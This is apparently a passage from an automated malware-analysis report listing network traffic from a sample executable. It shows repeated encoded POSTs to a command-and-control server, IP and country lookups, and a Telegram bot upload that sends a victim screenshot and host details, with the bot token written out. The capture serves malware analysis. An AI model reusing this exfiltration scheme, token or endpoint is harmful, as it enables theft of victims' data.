                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 59 21 2c 3f 5c 3e 33 2a 0f 2f 39 32 0c 32 32 3d 00 31 06 05 5b 36 2a 20 1f 2e 3e 2b 56 31 03 37 5d 3e 02 3a 53 33 01 2f 58 30 3b 2b 5d 0d 10 26 16 30 55 32 12 2a 28 0a 12 39 07 3a 5a 25 3d 2a 5f 36 2d 23 55 22 3d 3d 5f 25 5a 2f 0a 27 3d 32 0c 2b 1d 31 58 3b 12 37 16 25 14 2f 55 0f 11 3b 0c 32 06 23 00 35 03 02 0a 20 11 09 05 20 59 32 1d 23 20 37 58 26 3a 0d 58 32 3c 26 12 2a 23 3b 55 29 0c 35 15 25 14 26 08 28 08 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989Y!,?\>3*/9222=1[6* .>+V17]>:S3/X0;+]&0U2*(9:Z%=*_6-#U"==_%Z/'=2+1X;7%/U;2#5 Y2# 7X&:X2<&*#;U)5%&("S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                100192.168.2.5500855.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:32.082282066 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:32.435601950 CEST2156OUTData Raw: 5c 59 43 5f 5f 5a 55 5f 54 57 5b 54 52 5d 57 5c 58 57 58 5b 5b 5c 55 5f 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \YC__ZU_TW[TR]W\XWX[[\U__[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.B$7?(=)0!"%'Y,3])8)W4*.%Y?!/+"_$,P,/
                                                                                                Oct 11, 2024 20:39:32.791779995 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:32.921631098 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:32 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 5c 21 3f 0a 07 29 30 32 0e 38 04 22 0e 25 32 32 14 31 5e 37 14 21 14 1d 03 2e 10 0d 12 24 3a 2f 59 2b 3f 35 0d 33 11 2b 1d 30 3b 2b 5d 0d 10 25 07 27 0a 32 12 3d 16 38 1c 2c 3e 2e 5a 24 3d 36 17 36 3e 2b 53 36 3e 3e 04 24 3f 33 09 25 13 04 0c 3f 24 0b 5b 2c 2c 2f 58 24 2e 2f 55 0f 11 38 54 31 59 3c 5a 22 04 33 1e 34 11 34 5d 34 2f 2e 10 23 30 28 01 32 03 3c 02 25 3c 3a 12 3d 0a 2f 1f 3d 0b 21 15 31 03 39 1f 3f 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989\!?)028"%221^7!.$:/Y+?53+0;+]%'2=8,>.Z$=66>+S6>>$?3%?$[,,/X$./U8T1Y<Z"344]4/.#0(2<%<:=/=!19?2"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                101192.168.2.5500865.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:32.564825058 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:32.920021057 CEST2552OUTData Raw: 5c 5d 43 5c 5a 58 55 5e 54 57 5b 54 52 5f 57 55 58 56 58 59 5b 5e 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \]C\ZXU^TW[TR_WUXVXY[^UV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.0:3>8==(^%/""5,8$[*(.7^29>)Y>#/+"_$,P,'
                                                                                                Oct 11, 2024 20:39:33.275245905 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:33.403182983 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:33 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                102192.168.2.5500875.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:33.520337105 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:33.873148918 CEST2156OUTData Raw: 59 5f 43 58 5f 52 55 58 54 57 5b 54 52 5a 57 56 58 56 58 5a 5b 55 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_CX_RUXTW[TRZWVXVXZ[UU\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.A$)>+2=&4$Y%"60,+=-P4+)W9>&=4Y-"_$,P,3
                                                                                                Oct 11, 2024 20:39:34.263164997 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:34.384917021 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:34 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 5d 21 3f 3f 58 2a 30 3d 51 2e 3a 03 57 31 21 25 06 25 28 37 17 22 29 3c 5c 2e 10 23 1d 31 29 23 12 3d 12 00 57 24 11 01 58 24 11 2b 5d 0d 10 26 5c 26 30 21 00 3d 3b 2c 1c 3a 3e 31 06 24 3d 3a 5c 21 00 2b 18 36 2d 29 5f 26 2f 3b 0f 32 3e 25 57 3f 42 3a 00 2d 2c 33 59 25 04 2f 55 0f 11 38 1c 25 06 28 11 36 2e 33 53 37 06 37 07 37 59 2d 07 23 20 2b 58 31 2a 2f 59 26 2f 39 02 3d 0d 0e 0e 3e 54 29 17 25 2a 2e 0e 2b 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989]!??X*0=Q.:W1!%%(7")<\.#1)#=W$X$+]&\&0!=;,:>1$=:\!+6-)_&/;2>%W?B:-,3Y%/U8%(6.3S777Y-# +X1*/Y&/9=>T)%*.+2"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                103192.168.2.5500885.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:34.349879980 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:34.701384068 CEST2552OUTData Raw: 59 52 43 5f 5f 5d 55 5b 54 57 5b 54 52 5f 57 54 58 51 58 5f 5b 5d 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YRC__]U[TW[TR_WTXQX_[]UW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-$)?=]%=%<_',15%?Y.#<Z*9W4().:= ]-"_$,P,'
                                                                                                Oct 11, 2024 20:39:35.100614071 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:35.242341995 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                104192.168.2.5500895.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:34.957971096 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2128
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:35.310625076 CEST2128OUTData Raw: 59 5f 43 51 5a 5a 50 59 54 57 5b 54 52 59 57 53 58 56 58 5b 5b 55 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_CQZZPYTW[TRYWSXVX[[UUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.%*7)9*&3."6//$]>!;1S96*!4Z/;"_$,P,


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                105192.168.2.5500905.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:35.785021067 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:36.138816118 CEST2552OUTData Raw: 59 5d 43 58 5f 5e 50 5e 54 57 5b 54 52 5d 57 53 58 52 58 58 5b 5e 55 5b 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y]CX_^P^TW[TR]WSXRXX[^U[_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.3:0Z=8.)4',.5?8?(8U7^!P-==?!$].+"_$,P,/
                                                                                                Oct 11, 2024 20:39:36.579437971 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:36.594669104 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:36 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                106192.168.2.5500915.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:37.406117916 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:37.763725996 CEST2552OUTData Raw: 5c 59 43 51 5f 52 55 5f 54 57 5b 54 52 58 57 52 58 55 58 5b 5b 5b 55 58 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \YCQ_RU_TW[TRXWRXUX[[[UX_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-09<=]=*$',:Z#5,/#);2!+>..!*1#:+"_$,P,;
                                                                                                Oct 11, 2024 20:39:38.098081112 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:38.273564100 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:38 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                107192.168.2.5500925.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:39.259982109 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:39.607671976 CEST2552OUTData Raw: 5c 5a 43 51 5f 58 55 54 54 57 5b 54 52 59 57 55 58 56 58 5e 5b 54 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \ZCQ_XUTTW[TRYWUXVX^[TUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.')/=>=6Z'95/X/3$[(8-Q R.1>2$.;"_$,P,
                                                                                                Oct 11, 2024 20:39:40.351897955 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:40.353585958 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:39 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:39:40.353708029 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:39 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.54970434.117.59.814434708C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-11 18:37:11 UTC61OUTGET /ip HTTP/1.1
                                                                                                Host: ipinfo.io
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-11 18:37:11 UTC305INHTTP/1.1 200 OK
                                                                                                date: Fri, 11 Oct 2024 18:37:10 GMT
                                                                                                content-type: text/plain; charset=utf-8
                                                                                                Content-Length: 11
                                                                                                access-control-allow-origin: *
                                                                                                via: 1.1 google
                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
                                                                                                2024-10-11 18:37:11 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                Data Ascii: 8.46.123.33


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.54970534.117.59.814434708C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-11 18:37:12 UTC42OUTGET /country HTTP/1.1
                                                                                                Host: ipinfo.io
                                                                                                2024-10-11 18:37:12 UTC448INHTTP/1.1 200 OK
                                                                                                access-control-allow-origin: *
                                                                                                Content-Length: 3
                                                                                                content-type: text/html; charset=utf-8
                                                                                                date: Fri, 11 Oct 2024 18:37:12 GMT
                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                x-content-type-options: nosniff
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-xss-protection: 1; mode=block
                                                                                                via: 1.1 google
                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
                                                                                                2024-10-11 18:37:12 UTC3INData Raw: 55 53 0a
                                                                                                Data Ascii: US


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.549706149.154.167.2204434708C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-11 18:37:14 UTC255OUTPOST /bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto HTTP/1.1
                                                                                                Content-Type: multipart/form-data; boundary="34997188-a42f-41eb-990d-cfd33339eec7"
                                                                                                Host: api.telegram.org
                                                                                                Content-Length: 86200
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-11 18:37:14 UTC25INHTTP/1.1 100 Continue
                                                                                                2024-10-11 18:37:14 UTC40OUTData Raw: 2d 2d 33 34 39 39 37 31 38 38 2d 61 34 32 66 2d 34 31 65 62 2d 39 39 30 64 2d 63 66 64 33 33 33 33 39 65 65 63 37 0d 0a
                                                                                                Data Ascii: --34997188-a42f-41eb-990d-cfd33339eec7
                                                                                                2024-10-11 18:37:14 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                                2024-10-11 18:37:14 UTC10OUTData Raw: 36 39 35 31 33 38 35 33 38 36
                                                                                                Data Ascii: 6951385386
                                                                                                2024-10-11 18:37:14 UTC131OUTData Raw: 0d 0a 2d 2d 33 34 39 39 37 31 38 38 2d 61 34 32 66 2d 34 31 65 62 2d 39 39 30 64 2d 63 66 64 33 33 33 33 39 65 65 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                Data Ascii: --34997188-a42f-41eb-990d-cfd33339eec7Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                2024-10-11 18:37:14 UTC139OUTData Raw: 6e 65 77 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 20 21 0a 49 44 3a 20 63 62 39 66 30 34 66 35 32 35 66 39 65 31 32 39 38 32 39 37 33 34 31 63 33 66 39 30 39 66 64 65 31 33 39 36 66 39 39 37 0a 43 6f 6d 6d 65 6e 74 3a 20 70 72 6f 6c 69 76 20 31 0a 55 73 65 72 6e 61 6d 65 3a 20 61 6c 66 6f 6e 73 0a 50 43 20 4e 61 6d 65 3a 20 31 31 34 31 32 37 0a 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 0a 47 45 4f 3a 20 55 53 0a
                                                                                                Data Ascii: new user connect !ID: cb9f04f525f9e1298297341c3f909fde1396f997Comment: proliv 1Username: userPC Name: 114127IP: 8.46.123.33GEO: US
                                                                                                2024-10-11 18:37:14 UTC146OUTData Raw: 0d 0a 2d 2d 33 34 39 39 37 31 38 38 2d 61 34 32 66 2d 34 31 65 62 2d 39 39 30 64 2d 63 66 64 33 33 33 33 39 65 65 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                Data Ascii: --34997188-a42f-41eb-990d-cfd33339eec7Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                2024-10-11 18:37:14 UTC4096OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                                2024-10-11 18:37:14 UTC4096OUTData Raw: 73 5d d3 64 d2 3e 1a 69 96 53 0c 4a 93 29 71 e8 cc 1d 88 fc 09 c5 70 55 ea 9f 11 bf e4 5a 8b fe be 93 ff 00 41 6a f2 ca f5 f2 99 b9 d2 94 9e ee 4f f2 47 81 9d c1 42 bc 22 b6 51 5f 9b 12 8a 0d 15 ea 1e 38 52 52 d2 50 01 49 8a 5a 28 18 94 50 68 a0 02 93 9a 5a 43 4c 61 49 4b 45 00 25 14 b8 a4 a0 62 51 4b 8a 4a 00 4e f4 51 de 8a 06 14 1a 28 a0 04 a2 8a 28 18 86 92 9d 48 68 00 a4 a5 a0 d0 03 71 45 2d 14 0c 4a 4a 5a 28 18 94 51 45 00 25 14 1a 28 1d c4 34 98 a7 52 50 31 28 a5 a4 a0 10 62 92 96 83 40 c6 e2 8a 5a 28 01 31 49 4b 45 03 1a 68 a5 34 94 0c 29 29 69 29 80 52 62 96 92 90 c0 d2 52 d2 50 31 28 a5 a4 a0 02 90 8a 5a 28 18 d2 28 a5 a4 a0 62 51 de 94 d2 50 31 28 c5 2d 21 a0 62 11 48 69 c6 92 80 13 eb 49 4a 45 26 38 a0 62 66 8e 3a d2 d2 50 50 94 94 e3 48 28 04
